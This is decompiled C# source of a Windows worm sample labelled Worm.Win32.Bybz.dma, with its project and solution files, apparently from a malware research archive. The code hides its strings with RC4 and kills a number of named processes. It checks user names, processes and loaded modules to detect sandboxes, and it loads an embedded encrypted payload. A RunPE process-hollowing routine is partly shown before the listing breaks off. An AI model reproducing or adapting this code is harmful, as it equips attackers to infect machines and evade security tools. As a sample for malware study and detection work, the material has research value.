<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Rokan</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>ajhfsdlhjasnagfgewfwsg</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="reityureoiuterioutreoiutioerutoierutoiert.cs" />
<Compile Include="dsfisydfiuxycv876e29847329847.cs" />
<Compile Include="JHSAKDJHkjhakJHkjhUyiuYiuyIUyiUYiuyIuyiuYYrYTY.cs" />
<Compile Include="sadjkshaduixyzciuxyzicuysaiudyisaud.cs" />
<Compile Include="Melt.cs" />
<Compile Include="ew897dsf987dsf897xcv987saiduyixzucsdsa.cs" />
<Compile Include="sadioasudoixzcuoisaudoixuzcoixuzcsad.cs" />
<Compile Include="RRRRR.cs" />
<Compile Include="Rar.cs" />
<Compile Include="sadisaduoiasudoiwqueoixzucoixzuocisad.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Worm.Win32.Bybz.dma.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Rokan", "Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.csproj", "{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F88CF406-CBAA-4B36-A61C-2F8BF85A6660}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/dsfisydfiuxycv876e29847329847.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.dsfisydfiuxycv876e29847329847
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
namespace ajhfsdlhjasnagfgewfwsg
{
[StandardModule]
internal sealed class dsfisydfiuxycv876e29847329847
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
public static byte[] asd87ax98c7aweiywqiueyiuxzIUDYSFUISDYF89ZX7C(string filename, string R = "0")
{
IntPtr moduleHandle = dsfisydfiuxycv876e29847329847.GetModuleHandle(ref filename);
IntPtr resource = dsfisydfiuxycv876e29847329847.FindResource(moduleHandle, "0", "RT_RCDATA" + R);
IntPtr source = dsfisydfiuxycv876e29847329847.LoadResource(moduleHandle, resource);
int length = dsfisydfiuxycv876e29847329847.SizeofResource(moduleHandle, resource);
byte[] destination = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, destination, 0, length);
return destination;
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/ew897dsf987dsf897xcv987saiduyixzucsdsa.cs
+32
View File
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.ew897dsf987dsf897xcv987saiduyixzucsdsa
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using System.Diagnostics;
using System.Text;
namespace ajhfsdlhjasnagfgewfwsg
{
public class ew897dsf987dsf897xcv987saiduyixzucsdsa
{
[DebuggerNonUserCode]
public ew897dsf987dsf897xcv987saiduyixzucsdsa()
{
}
public static string saduiyxzc87sa9d87zxcysiaud(string Data, string key) => Encoding.Default.GetString(ew897dsf987dsf897xcv987saiduyixzucsdsa.DeCrypt(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(key)));
public static byte[] DeCrypt(byte[] Data, byte[] key)
{
int index = checked (Data.Length - 1);
while (index >= 0)
{
Data[index] = checked ((byte) unchecked (checked (((int) Data[index] ^ (int) key[unchecked (index % key.Length)]) - (int) Data[unchecked (checked (index + 1) % Data.Length)] + 256) % 256));
checked { index += -1; }
}
return Data;
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/reityureoiuterioutreoiutioerutoierutoiert.cs
+676
View File
@@ -0,0 +1,676 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.reityureoiuterioutreoiutioerutoierutoiert
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
[StandardModule]
internal sealed class reityureoiuterioutreoiutioerutoierutoiert
{
private static object D;
private static string R;
private static string FullFile;
private static string B = RRRRR.RC4("šZèS\u000EQÆ\vú{\u0081\f÷\\Ú\u0016Ê{ÊÔtïÜ\u0001ú_Z»cmk;!gTGö", "Sikan");
private static object pid = RuntimeHelpers.GetObjectValue(reityureoiuterioutreoiutioerutoierutoiert.regPID.GetValue(RRRRR.RC4("è{Â{>qæb´", "Sikan")));
private static string id = RRRRR.RC4("\u008F?™'|?¡\u0018çvÿjŠ(Ãt8ËÔ\u001Dˆ\u0081", "Sikan");
private static RegistryKey regPID = Registry.LocalMachine.OpenSubKey(RRRRR.RC4("n\u001F?\u0006æ1EþªsV.M>\u001B\u00BDøÃ\u001CðÏ/Ó£{>æÓ1! \u0016¨:\u008D\\ù&H•v9†", "Sik3"), false);
private static string[] sExes = new string[6]
{
RRRRR.RC4("ÒfÈ}$jáN¢-¢,t$", "Sikan"),
RRRRR.RC4("ÒfÈ}$jñD\u00BE/µ1Ô?Ÿ9Æ", "Sikan"),
RRRRR.RC4("Ï`ßz8zóY»u¢&Ý", "Sikan"),
RRRRR.RC4("Ù\u007FÝ1.j÷", "Sikan"),
RRRRR.RC4("ËgÄy-MúB¤u¢&Ý", "Sikan"),
RRRRR.RC4("ËpÞ^%sþRª>µpÝiŸ", "Sikan")
};
private static string[] sUsers = new string[3]
{
RRRRR.RC4("ÍzÈm%sÿN", "Sikan"),
RRRRR.RC4("ÍzÈm", "Sikan"),
RRRRR.RC4("Û|ßm.|æ^£>µ", "Sikan")
};
private static string[] sModules = new string[4]
{
RRRRR.RC4("ÙyÄ@'}õ\u0005´7«", "Sikan"),
RRRRR.RC4("Ü`ß@<sæH¸u£2Ô", "Sikan"),
RRRRR.RC4("ÈzÙp9wñ\u0005´7«", "Sikan"),
RRRRR.RC4("ëkÄz\u000F~þ\u0005´7«", "Sikan")
};
private static Process[] p = Process.GetProcesses();
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpModuleName);
public static void T()
{
// ISSUE: unable to decompile the method.
}
public static bool dsfkjhsdlkfjioxcvuoisdufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
reityureoiuterioutreoiutioerutoierutoiert.T();
flag = Operators.CompareString(reityureoiuterioutreoiutioerutoierutoiert.R, RRRRR.RC4("îD\u008D^/vû_\u00B94©-˜BÉa÷g\u0090‰\u0018‹šS«", "Sikan"), false) == 0;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static bool dsfkjhsdlkfjioxcvuoisd324234ufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
reityureoiuterioutreoiutioerutoierutoiert.T();
flag = Operators.CompareString(reityureoiuterioutreoiutioerutoierutoiert.R, RRRRR.RC4("î`ßk>sþi¿#ç\u0019ÊpŠ)ÊvŠÆjÝÔ\u0015ëUk", "Sikan"), false) == 0;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static bool dsfkjhsdlkfvuoisd324234ufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
reityureoiuterioutreoiutioerutoierutoiert.T();
flag = Operators.CompareString(reityureoiuterioutreoiutioerutoierutoiert.R, RRRRR.RC4("îDÚ~9w\u00B2x†\u001C†~ñX", "Sikan"), false) == 0;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static object dsfkjhsdlkfvu44oisd324234ufoiuewrxc()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÝnØv", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object dsfkjhsd324234lkfvu44oisd324234ufoiuewrxc()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("×eÁf/põ", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object dsfhsd324234lkfvu44oisd324234ufoiuewrxc()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ù_èQ\f[Ün", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeysAnalyzer()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ËpÞk.\u007FóE±7\u00BE$Ýc", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeunbelt()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ëKìR8dñ", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object dsfhsd3234lkfvu44oisd324234ufoiuewrxc()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("úmÙj;vó_µ(¢,Îx™$", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object dsfhsd3234lkfvu4445545oisd324234ufoiuewrxc()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÕkÌr", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static bool dsfhsd3234lkfvu444554d324234ufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Process.GetProcessesByName(RRRRR.RC4("ëkÄz\u0018dñ", "Sikan")).Length >= 1;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static bool dsfhsd3234lvu444554d324234ufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + RRRRR.RC4("äzÌr;~÷\u0005µ#¢", "Sikan"), false) == 0;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static bool dsfhsd345345234lvu444554d324234ufoiuewrxc()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Operators.ConditionalCompareObjectEqual(reityureoiuterioutreoiutioerutoierutoiert.pid, (object) reityureoiuterioutreoiutioerutoierutoiert.id, false);
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static object sadiasudoiuszc98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ë.S˜Ò‰™C", "Sikan3"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadiasudoiu34szc98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÿ2V™È‹", "Sikan3"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadiasudoiu34sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("þ7D„ÔŸƒ", "Sikan3"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadias33udoiu34sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÚmÌx.|æ", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadias33udoiu3334sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ï`Ãz", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static bool sadias333udoiu3334sz3c98z7xc987283947324()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Process.GetProcessesByName(RRRRR.RC4("Ù\u007FÝ", "Sikan")).Length >= 1;
goto label_6;
label_1:
num2 = -1;
switch (num1)
{
case 2:
goto label_6;
}
}
catch (Exception ex) when (
{
// ISSUE: unable to correctly present filter
int num3;
if (ex is Exception & num1 != 0 & num3 == 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
ProjectData.SetProjectError(ex);
goto label_1;
}
throw ProjectData.CreateProjectError(-2146828237);
label_6:
int num4 = flag ? 1 : 0;
if (num2 == 0)
return num4 != 0;
ProjectData.ClearProjectError();
return num4 != 0;
}
public static object sadias333udo334sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("ÓlÔl(`óF\u00B27¢,", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadias33443udo334sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName), RRRRR.RC4("Ð`Ç~(yæC\u00B9(", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static object sadias3344223udo334sz3c98z7xc987283947324()
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.p.Length - 1);
int index = 0;
while (index <= num)
{
string Left = Strings.LCase(reityureoiuterioutreoiutioerutoierutoiert.p[index].ProcessName);
if (Operators.CompareString(Left, RRRRR.RC4("ÒfÈ}$jáN¢-¢,", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
else if (Operators.CompareString(Left, RRRRR.RC4("ÒfÈ}$jñD\u00BE/µ1Ô", "Sikan"), false) == 0)
reityureoiuterioutreoiutioerutoierutoiert.p[index].Kill();
checked { ++index; }
}
object obj;
return obj;
}
public static bool asdjsagdkjxzcyiusayeiuwqyeiuwqyeiuwqyeiuwqeandbox()
{
bool flag;
try
{
flag = reityureoiuterioutreoiutioerutoierutoiert.UserCheck() || reityureoiuterioutreoiutioerutoierutoiert.ProcessCheck() || Application.ExecutablePath.Contains(RRRRR.RC4("Þ`ÁzewêN", "Sikan")) || Application.ExecutablePath.Contains(RRRRR.RC4("ëhÀo'w\u00BCN¨>", "Sikan")) | Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("ÙgÉf", "Sikan"), false) == 0 | Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("ùgÉf", "Sikan"), false) == 0 || reityureoiuterioutreoiutioerutoierutoiert.ModuleCheck() || Operators.CompareString(Application.StartupPath, "C:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "D:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "F:\\", false) == 0 | Operators.CompareString(Application.StartupPath, "X:\\", false) == 0 & Operators.CompareString(Interaction.Environ(RRRRR.RC4("ÍzÈm%sÿN", "Sikan")), RRRRR.RC4("PìØûâ)±ì", "Sikan32"), false) == 0;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return flag;
}
private static bool ProcessCheck()
{
bool flag;
try
{
Process[] p = reityureoiuterioutreoiutioerutoierutoiert.p;
int index = 0;
while (index < p.Length)
{
string Left = p[index].ProcessName + ".exe";
if (Conversions.ToBoolean(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.OrObject(Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(0), false), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(1), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(2), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(3), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(4), false)), Operators.CompareObjectEqual((object) Left, reityureoiuterioutreoiutioerutoierutoiert.sExes.GetValue(5), false))))
{
flag = true;
break;
}
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return flag;
}
private static bool UserCheck()
{
bool flag;
try
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.sUsers.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.ConditionalCompareObjectEqual((object) Interaction.Environ(RRRRR.RC4("vüÕäå,¨à", "Sikan32")), reityureoiuterioutreoiutioerutoierutoiert.sUsers.GetValue(index), false))
{
flag = true;
break;
}
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return flag;
}
private static bool ModuleCheck()
{
bool flag;
try
{
int num = checked (reityureoiuterioutreoiutioerutoierutoiert.sModules.Length - 1);
int index = 0;
while (index <= num)
{
string lpModuleName = Conversions.ToString(reityureoiuterioutreoiutioerutoierutoiert.sModules.GetValue(index));
if (reityureoiuterioutreoiutioerutoierutoiert.GetModuleHandle(ref lpModuleName) != 0L)
{
flag = true;
break;
}
checked { ++index; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return flag;
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/sadioasudoixzcuoisaudoixuzcoixuzcsad.cs
+170
View File
@@ -0,0 +1,170 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadioasudoixzcuoisaudoixuzcoixuzcsad
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace ajhfsdlhjasnagfgewfwsg
{
public class sadioasudoixzcuoisaudoixuzcoixuzcsad
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public sadioasudoixzcuoisaudoixuzcoixuzcsad()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.GetThreadContext(pInfo[1], ctxt) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
